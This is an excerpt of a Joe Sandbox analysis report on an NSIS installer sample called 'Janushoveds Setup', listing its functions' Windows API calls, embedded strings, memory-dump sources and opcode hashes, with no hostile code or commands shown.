SendMessageW.USER32(00000000,00000443,?,?), ref: 0040439F
SendMessageW.USER32(00000000,00000445,?,04010000), ref: 004043AD
lstrlenW.KERNEL32(?,?,04010000,?,?,?,00000000), ref: 004043B2
SendMessageW.USER32(00000000,00000435,?,00000000), ref: 004043BF
SendMessageW.USER32(00000000,00000449,?,?), ref: 004043D4

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: MessageSend$ButtonCheckColorItemlstrlen
String ID:
API String ID: 1008850623-0
Opcode ID: 5233311059dd207dde4360c340b317ac74a5a43ec41aa9b35b2e8dcb63a3240b
Instruction ID: cdae61568e6ea9b8d5b13b82b4945475f556892225fa3a195f49dd648399fb8e
Opcode Fuzzy Hash: 5233311059dd207dde4360c340b317ac74a5a43ec41aa9b35b2e8dcb63a3240b
Instruction Fuzzy Hash: 6D3181B1A00108BFDB019F64DD85EAD3BB8FB85744F00407AFA05BB1A0D7799E51DBA4

Function 004062E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Kb94RzMYNf.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00406347
CharNextW.USER32(?,?,?,00000000), ref: 00406356
CharNextW.USER32(?,00000000,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Kb94RzMYNf.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040635B
CharPrevW.USER32(?,?,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Kb94RzMYNf.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040636E

Strings

*?|<>/":, xrefs: 00406336
C:\Users\user\AppData\Local\Temp\, xrefs: 004062E5
"C:\Users\user\Desktop\Kb94RzMYNf.exe", xrefs: 004062E4

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Kb94RzMYNf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-705300654
Opcode ID: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
Instruction ID: 318300b0f17d4b51c4b24ffcfd5e9ca079934b39012f6efb3a6e40df4f12a45c
Opcode Fuzzy Hash: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
Instruction Fuzzy Hash: EF11B22680071695DB303B149C40AB7A2B8EF58790B56903FED8AB32C1F77C5C9286FD

Function 0040417B Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404198
GetSysColor.USER32(00000000), ref: 004041B4
SetTextColor.GDI32(?,00000000), ref: 004041C0
SetBkMode.GDI32(?,?), ref: 004041CC
GetSysColor.USER32(?), ref: 004041DF
SetBkColor.GDI32(?,?), ref: 004041EF
DeleteObject.GDI32(?), ref: 00404209
CreateBrushIndirect.GDI32(?), ref: 00404213

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
Instruction ID: 1f16dc129e5574868776b4f98a2cc19ea4617ee8107c94e5cfbd03f7ded5ca1d
Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
Instruction Fuzzy Hash: 1F2181B1500704ABCB219F68DE08B5BBBF8AF41714B04896DF992F66A0D734E944CB64

Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1

Part of subcall function 00405D06: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D1C

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D

Strings

9, xrefs: 00402630

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: c65befc1453d79e0c2e8f89943b80396fddc1db08f78317adda9697148674731
Instruction ID: c1a49ad6acc88ab736a24109aaa050e218125fd0ad183605519c9d8fb0938606
Opcode Fuzzy Hash: c65befc1453d79e0c2e8f89943b80396fddc1db08f78317adda9697148674731
Instruction Fuzzy Hash: EC510874D00219AADF209F94CA88AAEB779FF04344F50447BE501F72D0D7B99982DB69

Function 00404A79 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A94
GetMessagePos.USER32 ref: 00404A9C
ScreenToClient.USER32(?,?), ref: 00404AB6
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AC8
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AEE

Strings

f, xrefs: 00404ACA

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
Instruction ID: f7db0f90848f06194adfa2b80852422f0d01f782293f8b66888e1da33f3275eb
Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
Instruction Fuzzy Hash: 28015271E4021CBADB00DB94DD85FFEBBBCAF59711F10012BBA51B61C0C7B495018BA4

Function 00402D04 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
MulDiv.KERNEL32(000BF3F6,00000064,000BF3FA), ref: 00402D4D
wsprintfW.USER32 ref: 00402D5D
SetWindowTextW.USER32(?,?), ref: 00402D6D
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F

Strings

verifying installer: %d%%, xrefs: 00402D57

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 9823b761f001492aa494ef634f2695fad7e965f30442b605b2107c3f38143bb8
Instruction ID: e3b7989a6944ee3f74a5da6e22ee0ffb045f4e525cc1af55651639455de3416a
Opcode Fuzzy Hash: 9823b761f001492aa494ef634f2695fad7e965f30442b605b2107c3f38143bb8
Instruction Fuzzy Hash: F9014F7064020DBBEF249F61DE49FEA3B69FB04304F008439FA02A91E0DBB889559B58

Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D00
GetClientRect.USER32(00000000,?), ref: 00401D0D
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
DeleteObject.GDI32(00000000), ref: 00401D4B

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 0fd3fa23c975e38c6d473a192a1cf371983019d3a64ccaac555819f547ea3512
Instruction ID: d5b0b812c52730b156692ce296a05b57ce8d9064807eae1c9fc7a35bbe74f0db
Opcode Fuzzy Hash: 0fd3fa23c975e38c6d473a192a1cf371983019d3a64ccaac555819f547ea3512
Instruction Fuzzy Hash: C7F0E172501504AFD701DBE4DE88CEEBBBDEB48311B10447AF541F51A1CA749D018B28

Function 00401D56 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D59
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
ReleaseDC.USER32(?,00000000), ref: 00401D86
CreateFontIndirectW.GDI32(0040CDD8), ref: 00401DD1

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: bb59d375fd00ea9bf7a16e1c15933f8724b19bfa5ac8ca4f719c71241bcbf4da
Instruction ID: 1901d7d296450183f5894fa9bbb5198f988e596920eebf68b9e2cfe033e75292
Opcode Fuzzy Hash: bb59d375fd00ea9bf7a16e1c15933f8724b19bfa5ac8ca4f719c71241bcbf4da
Instruction Fuzzy Hash: 0A016271984640FFEB01ABB4AF8AB9A3F75AF65301F104579E541F61E2D97800059B2D

Function 0040496B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A0C
wsprintfW.USER32 ref: 00404A15
SetDlgItemTextW.USER32(?,0042D248), ref: 00404A28

Strings

%u.%u%s%s, xrefs: 004049F6

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 224b46551f0518a21af59e08ab662a7d6db9c20c9ea580731f6276641f89a3f9
Instruction ID: 0b736bf888c47b86caf201b097c22cff5488322ea99b5df57e3066faec5b3164
Opcode Fuzzy Hash: 224b46551f0518a21af59e08ab662a7d6db9c20c9ea580731f6276641f89a3f9
Instruction Fuzzy Hash: 9011E773A041283BDB10957D9C41EAF329CAB85334F254237FA25F31D1D978CD2182E9

Function 00403B6F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(00000000,Janushoveds Setup), ref: 00403C07

Strings

"C:\Users\user\Desktop\Kb94RzMYNf.exe", xrefs: 00403B70
1033, xrefs: 00403B73, 00403B7D, 00403BEE
Janushoveds Setup, xrefs: 00403BF6

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\Kb94RzMYNf.exe"$1033$Janushoveds Setup
API String ID: 530164218-4240642014
Opcode ID: 59ce6dc07d6ca67894d75a769e307db226b6569afcabdc78d824c7418b618399
Instruction ID: 847b53d7ec13df621055667e1e13bb36484023f01c55a5fe093bb98d5154ae24
Opcode Fuzzy Hash: 59ce6dc07d6ca67894d75a769e307db226b6569afcabdc78d824c7418b618399
Instruction Fuzzy Hash: 0611F035B046118BC3209F15DC40A737BBDEB8971A328417FE901AB3E1CB3DAD028B98

Function 00402537 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,0040B5D0,000000FF,C:\Users\user\AppData\Local\Temp\nsj9A32.tmp\nsExec.dll,00000400,?,?,00000021), ref: 00402583
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj9A32.tmp\nsExec.dll,?,?,0040B5D0,000000FF,C:\Users\user\AppData\Local\Temp\nsj9A32.tmp\nsExec.dll,00000400,?,?,00000021), ref: 0040258E

Strings

C:\Users\user\AppData\Local\Temp\nsj9A32.tmp\nsExec.dll, xrefs: 00402552, 00402575, 00402589, 004025D5

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsj9A32.tmp\nsExec.dll
API String ID: 3109718747-3313819243
Opcode ID: 9638f0c716bd08f9217f8ac97dbdde4665538f929ad9b7691c1d64753cc7c8ee
Instruction ID: 0e395622636dcde05068836be4baa4a456a4d64089cc24394ac90f0f0b10d43f
Opcode Fuzzy Hash: 9638f0c716bd08f9217f8ac97dbdde4665538f929ad9b7691c1d64753cc7c8ee
Instruction Fuzzy Hash: A511E772A01204BADB10AFB18F4EA9E32659F54354F24403BF502F61C1DAFC9A41966E

Function 00405B0C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Janushoveds Setup,NSIS Error), ref: 0040605D

Part of subcall function 00405AAF: CharNextW.USER32(?,?,0042FA50,?,00405B23,0042FA50,0042FA50, 4Mw,?,C:\Users\user\AppData\Local\Temp\,00405861,?,774D3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405ABD
Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405AC2
Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405ADA

lstrlenW.KERNEL32(0042FA50,00000000,0042FA50,0042FA50, 4Mw,?,C:\Users\user\AppData\Local\Temp\,00405861,?,774D3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B65
GetFileAttributesW.KERNEL32(0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,00000000,0042FA50,0042FA50, 4Mw,?,C:\Users\user\AppData\Local\Temp\,00405861,?,774D3420,C:\Users\user\AppData\Local\Temp\), ref: 00405B75

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B0C
4Mw, xrefs: 00405B0E

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 4Mw$C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3850734506
Opcode ID: 1860d25d1cedceeae653fbc66b59fe140c8df0ce2729e3c8c9131a1b177ba99c
Instruction ID: 63a6569c831ee5581447f3e1e8ec18e6ac74a78ddfb021a14ce772f4501d9fee
Opcode Fuzzy Hash: 1860d25d1cedceeae653fbc66b59fe140c8df0ce2729e3c8c9131a1b177ba99c
Instruction Fuzzy Hash: 32F0F435100E1119D62632361C49BAF2664CF82324B4A023FF952B22D1DB3CB993CC7E

Function 00405A04 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405A0A
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405A14
lstrcatW.KERNEL32(?,0040A014), ref: 00405A26

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A04

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
